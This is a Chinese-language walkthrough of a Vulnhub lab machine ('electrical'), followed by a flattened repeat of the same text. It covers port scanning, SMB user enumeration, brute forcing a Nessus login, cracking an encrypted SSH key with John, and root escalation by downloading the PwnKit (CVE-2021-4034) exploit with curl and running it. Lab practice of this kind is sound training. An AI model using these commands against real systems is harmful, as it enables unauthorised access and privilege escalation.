打靶记录---vulnhub靶场之【digital world.local系列】的electrical靶机
字数 1750 2025-08-29 08:30:12

Vulnhub靶机实战:digitalworld.local-electrical 渗透测试教学文档

1. 靶机概述

  • 靶机名称:digitalworld.local-electrical
  • 来源:Vulnhub官网
  • 下载地址:
    • Vulnhub官网
    • 网盘链接:https://pan.quark.cn/s/86cf8a398835
  • 网络配置:桥接模式
  • 初始IP:192.168.10.12(重装后变为192.168.10.11)

2. 环境准备

攻击机配置

  • 系统:Kali Linux
  • IP地址:192.168.10.6
  • 工具:
    • VMware虚拟机
    • nmap
    • enum4linux
    • dirsearch/dirb
    • Burp Suite
    • John the Ripper
    • pspy64
    • linpeas.sh

靶机加载方式

  1. 使用VirtualBox直接加载
  2. 使用VMware加载
  3. 使用ISO镜像文件安装

3. 信息收集阶段

主机发现

arp-scan -l
netdiscover -r 192.168.10.1/24
nmap -sn 192.168.10.1/24

端口扫描

TCP端口扫描

nmap -sT 192.168.10.12 --min-rate=1000 -p- -oA nmap-tcp

发现开放端口:22, 80, 8080, 68, 69, 138, 161, 631, 1434, 1900

UDP端口扫描

nmap -sU 192.168.10.12 --top-ports 20 -T4 -oA nmap-udp

详细服务扫描

ports=22,80,8080,68,69,138,161,631,1434,1900
nmap -sV -O -sC -sT 192.168.10.12 -p $ports -oA detail

漏洞脚本扫描

nmap --script=vuln 192.168.10.12 -p $ports -oA vuln

4. 服务枚举与漏洞探测

SMB服务探测

enum4linux 192.168.10.12

发现:

  • 共享目录:print\( 和 IPC\)
  • 用户:govindasamy 和 electrical

8834端口探测

  • 访问方式:https://192.168.10.12:8834
  • 使用whatweb识别:
whatweb https://192.168.10.12:8834
  • 使用Wappalyzer浏览器插件识别

目录爆破

dirsearch -u https://192.168.10.12:8834 -x 403,404 -e js,txt,zip,bak,cfm,dbm

发现/api目录

5. 密码爆破

使用Burp Suite进行爆破

  1. 拦截登录请求
  2. 发送到Intruder模块
  3. 选择攻击类型:Sniper或Pitchfork
  4. 设置攻击点:用户名和密码字段
  5. 使用字典:
    • 用户名:govindasamy, electrical
    • 密码:/usr/share/wordlists/fasttrack.txt 或 rockyou.txt

成功获取凭证:

  • 用户名:govindasamy
  • 密码:password

6. 敏感信息泄露

Nessus Web界面分析

  1. 登录后发现是Nessus漏洞扫描的Web界面
  2. 使用Burp Suite抓取所有请求
  3. 在"scan" → "credentialed check" → "configuration"中发现隐藏文本域
  4. 获取SSH私钥(加密的)

私钥处理

  1. 将私钥保存为id1文件
  2. 使用John破解私钥密码:
ssh2john id1 > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

发现密码:electrical(用户名)

7. SSH登录

chmod 600 id1
ssh electrical@192.168.10.11 -p 22222 -i id1

8. 靶机内信息收集

基础信息收集

# 查看用户文件
ls -al /home
cat /etc/passwd | grep /bin/bash

# 网络连接状态
ss -antulp
netstat -antulp

# IP地址
ip add

# 进程查看
ps aux | grep root
top

# SUID文件查找
find / -perm -u=s -type f 2>/dev/null

# 系统版本信息
uname -a
uname -r
cat /etc/issue
cat /etc/*release
lsb_release -a

# 定时任务
crontab -l
cat /etc/crontab
atq

上传检测工具

  1. pspy64(检测隐藏进程)
scp -P 22222 -i id1 pspy64 electrical@192.168.10.11:/tmp
  1. linpeas.sh(自动化检测脚本)
scp -P 22222 -i id1 linpeas.sh electrical@192.168.10.11:/tmp

9. 提权利用

发现可利用漏洞

  • 发现具有SUID权限的文件:
    • /usr/libexec/polkit-agent-helper-1
    • /usr/bin/pkexec
  • 结合linpeas.sh检测结果,可能存在CVE-2021-4034(PwnKit)漏洞

CVE-2021-4034利用

  1. 下载POC:
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
  1. 上传到靶机:
scp -P 22222 -i id1 PwnKit electrical@192.168.10.11:/tmp
  1. 执行提权:
chmod +x PwnKit
./PwnKit
  1. 成功获取root权限

10. 总结与学习要点

渗透测试流程总结

  1. 信息收集:全面扫描端口和服务
  2. 服务枚举:对每个开放服务进行详细探测
  3. 密码爆破:对需要认证的服务尝试弱密码
  4. 敏感信息挖掘:仔细检查每个功能点可能的信息泄露
  5. 权限提升:结合系统信息和公开漏洞

关键技术点

  1. SMB用户枚举为后续爆破提供用户名列表
  2. Web界面中的隐藏信息(SSH私钥)是突破点
  3. 加密的SSH私钥可通过John工具破解
  4. SUID文件检查结合漏洞利用实现提权
  5. 自动化工具(linpeas, pspy)辅助发现漏洞

防御建议

  1. 避免使用弱密码
  2. 定期检查系统SUID文件
  3. 及时更新系统补丁
  4. 限制敏感信息的Web展示
  5. 对SSH私钥使用强密码保护

11. 参考资源

  1. PwnKit漏洞利用:https://github.com/ly4k/PwnKit
  2. Vulnhub靶机下载:https://www.vulnhub.com/
  3. John the Ripper使用指南
  4. LinPEAS项目:https://github.com/carlospolop/PEASS-ng
Vulnhub靶机实战:digitalworld.local-electrical 渗透测试教学文档 1. 靶机概述 靶机名称:digitalworld.local-electrical 来源:Vulnhub官网 下载地址: Vulnhub官网 网盘链接:https://pan.quark.cn/s/86cf8a398835 网络配置:桥接模式 初始IP:192.168.10.12(重装后变为192.168.10.11) 2. 环境准备 攻击机配置 系统:Kali Linux IP地址:192.168.10.6 工具: VMware虚拟机 nmap enum4linux dirsearch/dirb Burp Suite John the Ripper pspy64 linpeas.sh 靶机加载方式 使用VirtualBox直接加载 使用VMware加载 使用ISO镜像文件安装 3. 信息收集阶段 主机发现 端口扫描 TCP端口扫描 发现开放端口:22, 80, 8080, 68, 69, 138, 161, 631, 1434, 1900 UDP端口扫描 详细服务扫描 漏洞脚本扫描 4. 服务枚举与漏洞探测 SMB服务探测 发现: 共享目录:print$ 和 IPC$ 用户:govindasamy 和 electrical 8834端口探测 访问方式:https://192.168.10.12:8834 使用whatweb识别: 使用Wappalyzer浏览器插件识别 目录爆破 发现/api目录 5. 密码爆破 使用Burp Suite进行爆破 拦截登录请求 发送到Intruder模块 选择攻击类型:Sniper或Pitchfork 设置攻击点:用户名和密码字段 使用字典: 用户名:govindasamy, electrical 密码:/usr/share/wordlists/fasttrack.txt 或 rockyou.txt 成功获取凭证: 用户名:govindasamy 密码:password 6. 敏感信息泄露 Nessus Web界面分析 登录后发现是Nessus漏洞扫描的Web界面 使用Burp Suite抓取所有请求 在"scan" → "credentialed check" → "configuration"中发现隐藏文本域 获取SSH私钥(加密的) 私钥处理 将私钥保存为id1文件 使用John破解私钥密码: 发现密码:electrical(用户名) 7. SSH登录 8. 靶机内信息收集 基础信息收集 上传检测工具 pspy64(检测隐藏进程) linpeas.sh(自动化检测脚本) 9. 提权利用 发现可利用漏洞 发现具有SUID权限的文件: /usr/libexec/polkit-agent-helper-1 /usr/bin/pkexec 结合linpeas.sh检测结果,可能存在CVE-2021-4034(PwnKit)漏洞 CVE-2021-4034利用 下载POC: 上传到靶机: 执行提权: 成功获取root权限 10. 总结与学习要点 渗透测试流程总结 信息收集:全面扫描端口和服务 服务枚举:对每个开放服务进行详细探测 密码爆破:对需要认证的服务尝试弱密码 敏感信息挖掘:仔细检查每个功能点可能的信息泄露 权限提升:结合系统信息和公开漏洞 关键技术点 SMB用户枚举为后续爆破提供用户名列表 Web界面中的隐藏信息(SSH私钥)是突破点 加密的SSH私钥可通过John工具破解 SUID文件检查结合漏洞利用实现提权 自动化工具(linpeas, pspy)辅助发现漏洞 防御建议 避免使用弱密码 定期检查系统SUID文件 及时更新系统补丁 限制敏感信息的Web展示 对SSH私钥使用强密码保护 11. 参考资源 PwnKit漏洞利用:https://github.com/ly4k/PwnKit Vulnhub靶机下载:https://www.vulnhub.com/ John the Ripper使用指南 LinPEAS项目:https://github.com/carlospolop/PEASS-ng